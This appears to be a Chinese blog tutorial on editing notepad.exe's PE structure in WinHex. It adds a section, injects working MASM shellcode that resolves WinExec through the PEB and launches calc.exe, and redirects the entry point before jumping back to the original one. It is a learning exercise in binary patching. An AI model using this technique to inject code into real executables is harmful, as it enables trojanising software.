AI智能
改变未来

修改记事本PE结构弹计算器Shellcode

[toc]

修改记事本PE结构弹计算器Shellcode

0x00 前言

在上一篇文章中介绍了PE节表的分析,这篇文章主要是对其进行手动实验来加深对节表的理解,并且这里用一个记事本的例子做演示,我们用Winhex软件通过修改、添加十六进制数据让记事本一启动就能弹出计算器。

整体的思路是:给记事本添加一个节,节内添加弹计算器Shellcode十六进制+jmp到原OEP(程序入口点),修改OEP指向->新区段位置。运行记事本让其弹计算器。

0x01 添加新节

首先需要找一个

32位

的记事本,我这里用的是xp系统下的

notepad.exe

修改节数量

第一步我们先修改节数量,之前都有介绍节数量在标准PE头中的NT标识后4个字节,这里原本是

3

我们将其改成4。

节表位置

节表位置在

可选PE头

下面,所以我们先找到可选PE头,并且找到可选PE头的大小就能找到节表位置了。可选PE头大小在

NT标识

开始0x14字节位置。

添加新节表信息

新节信息的位置应该在节表数量*3的位置即:节表开始处+(3 x 0x28=0x78处),一个节信息固定大小

0x28

然后我们将荧光笔中的数据覆盖成我们新节的信息。

新节名就叫

.hack

把,hack节哈哈挺酷。然后节在内存中大小就设成

0x1000

,新节在内存中的位置为

0x13000

这个

0x13000

即新节位置是根据:之前最后一个节(内存中节位置+对其后节大小)计算出来的,可以根据我们上篇文章写的工具来进行分析。

0xb000+0x8000

等于

0x13000

,所以这是新节位置。这里一定不要算错了要不然程序会崩溃。

接着是文件中节的大小即对其后节的大小0x1000刚好对其,所以也设置成

0x1000

。接着是新节在文件中的位置,这里同样我们得到之前最后一个节在文件中的偏移,然后再加上文件中节大小就是其新节位置了。

(新节在文件中的位置)

0x8400+0x8000=0x10400

,然后其余还有4各成员数据默认都设置成

0x00

,最后一个比较关键之前也讲过他是节的属性,决定了改节是否可读、写、执行。

在这里我们直接将他设置成代码段的属性

(包含可执行代码),(可读),(可执行)

0x60000020

。这里不懂的可以复习下PE节表的详细分析。

新节信息
Name .hack
VirtualSize(内存中大小) 0x1000
VirtualAddress(内存中偏移) 0x13000
SizeOfRawData(文件中大小) 0x1000
PointerToRawData(文件中偏移) 0x10400
PointerToRelocations 0x00000000
PointerToLinenumbers 0x00000000
NumberOfRelocations 0x0000
NumberOfLinenumbers 0x0000
Characteristics(标志节属性) 0x60000020

最后在

0x104000

位置添加

0x1000

数据,也就是文件末尾处我们添加0x1000个0的数据。

先用Winhex新建一个0x1000的文件

然后复制数据到notepad.exe文件末尾处。

至此新节添加完毕,我们可以来添加shellcode了。

0x02 添加弹计算器Shellcode

好了到这里我们可以来添加我们的Shellcode了,首先我们需要用汇编写一个弹计算器的代码,然后将其转换成十六进制。

.386.model flat,stdcall; 代码区域.codemain:push ebpmov ebp,espsub esp,20h; 开辟栈空间;获取Kernel32基址assume fs:nothingmov eax,[fs:30h]; peb结构所在地址mov eax,[eax+0Ch]; Ldrmov eax,[eax+1Ch]; 指向ntdllmov eax,[eax]; 指向kernelbasemov eax,[eax]; 指向kernel32mov eax,[eax+08h]; BaseAddress;遍历kernel32导出函数;初始化栈空间用来保存变量mov DWORD PTR[ebp-04h],0; 用来存放导出函数“地址表”mov DWORD PTR[ebp-08h],0; 用来存放导出函数“名称表”mov DWORD PTR[ebp-0Ch],0; 用来存放导出函数“序号表”; 解析PE结构获取导出表结构实际地址mov ebx,DWORD PTR[eax + 3Ch]   ; NT头偏移地址lea ebx,DWORD PTR[ebx + eax]   ; NT头VAmov ebx,DWORD PTR[ebx + 78h]   ; 导出表结构VirtualAddresslea edx,DWORD PTR[ebx + eax]   ; 导出表结构实际地址; 获取导出函数地址表VAmov ebx,DWORD PTR[edx + 1Ch]   ; AddressOfFunctions 偏移lea ebx,DWORD PTR[ebx + eax]   ; AddressOfFunctions 实际地址mov DWORD PTR[ebp - 04h],ebx   ; 保存到局部变量; 获取导出函数名称表VAmov ebx,DWORD PTR[edx + 20h]   ; AddressOfNames 偏移lea ebx,DWORD PTR[ebx + eax]   ; AddressOfNames 实际地址mov DWORD PTR[ebp - 08h],ebx   ; 保存到局部变量; 获取导出函数序号表VAmov ebx,DWORD PTR[edx + 24h]   ; AddressOfNameOrdinals 偏移lea ebx,DWORD PTR[ebx + eax]   ; AddressOfNameOrdinals 实际地址mov DWORD PTR[ebp - 0Ch],ebx   ; 保存到局部变量; 开始遍历三张表,找到目标函数地址mov edi,DWORD PTR[edx + 18h]   ; NumberOfNames循环次数xor ecx,ecx		       ; 清空ecx,作为循环计数mov esi,DWORD PTR[ebp - 08h]   ; 暂存导出函数名称表 实际地址_ExportName:mov ebx,DWORD PTR[esi + ecx * 4];函数名称 偏移地址lea ebx,DWORD PTR[ebx + eax]; 获取第n个导出函数的名称 实际地址; 判断函数名称mov ebx,[ebx]cmp ebx,456E6957h;判断是否WinEje _FindFunc;自增1,开始下一次遍历inc ecx;jmp _ExportName_FindFunc:;找到目标函数,获取该函数地址VAmov ebx,DWORD PTR[ebp - 0Ch]    ; 序号表 实际地址xor edx,edx		        ; 注意序号表是2字节数组mov dx,WORD PTR[ebx + ecx * 2]  ; 获取对应序号表中保存的值mov ebx,DWORD PTR[ebp - 04h]    ; 地址表 实际地址mov ebx,DWORD PTR[ebx + edx * 4]; 地址表中,目标函数地址 偏移地址lea eax,DWORD PTR[ebx + eax]    ; 目标函数实际地址;; 调用函数jmp _gotFuncg_str db "calc.exe"g_stop db 0_gotFunc:	call $+5pop ebx;获取eipsub ebx,0Ehpush 5hpush ebxcall eax; 恢复函数栈帧mov esp,ebppop ebpretend mainend

用MASM套件中的ml将其编译成可执行文件,这里我推荐用RadASM这工具来写Windows汇编代码,他是一个专门用来写汇编的IDE非常好用 YYDS!

然后我们用Winhex打开这个编译好的exe提取他代码段中的数据作为Shellcode。

修改代码

然后我们需要将代码在改一改,比如在shellcode的最后一个地方C3这里对应的汇编代码是

ret

这样会让程序返回到调用的地方,这里我需要将其改成

nop

即:0x90。

0040101D| C3  ret;C3改为如下900040101D| 90  nop

然后我们还要跳回到原来的入口点,这样程序才能正常执行他原本的功能。

跳转的代码是

jmp

,然后我们需要计算出当前位置距离OEP的位置,目前还不知道距离所以先写

jmp 0x0000000

来代替即

E9 00 00 00 00

我们先把Shellcode覆盖到新节的位置,利用WinHex的写入hex数据来覆盖之前的0数据。

覆盖后的shellcode。

0x03 修改入口点

在最后我们需要修改入口点来使的notepad.exe一开始就先执行我们的shellcode代码,不知道怎么改入口点的读者可以看看我之前写的文章PE头详细分析。

原来的入口点地址为:

0x0000739D

修改为shellcode处的入口点:

0x00010400

计算跳转OEP偏移

好了在最后我们需要把

E9 00000000

中的数据给填上,才能真正的完成。计算公式为:

(原OEP)-((当前地址)+5)

先把光标停在

E9

处,然后Winhex中显示地址为

0x1049F

,那么我们可以把公式中的当前地址改成0x1049F,即

(0x0000739D)-((0x1049F)+5)

最后利用Python来计算下偏移,算出来是负数的因为他要往上跳,正常是应该为负数。

然后用最终用计算器将其转换成十六进制,并且我们取他的4字节就行。

最后我们把地址给填上,收工完成。

0x04 bug修复

哈哈哈哈果然没有那么幸运,我一运行时候发现程序报错了。

然后仔细研究后发现,

SizeofImage

这个值我没有改,得把他改成添加节后的大小

0x14000

还有就是入口点偏移没算对,因为我发现新的段在内存中不在

0x14000

,而是在0x13000,应该是我们没有把之前那个段填对其,导致我们新加的段被他对其,所以地址就变成了0x13000。

这里我计算出新的偏移:0xFFFF42F9

修复后winhex中的地址。

最后把入口点也修复成:

0x13000

0x05 验证结果

欢迎各位加群:

赞(0) 打赏
未经允许不得转载:爱站程序员基地 » 修改记事本PE结构弹计算器Shellcode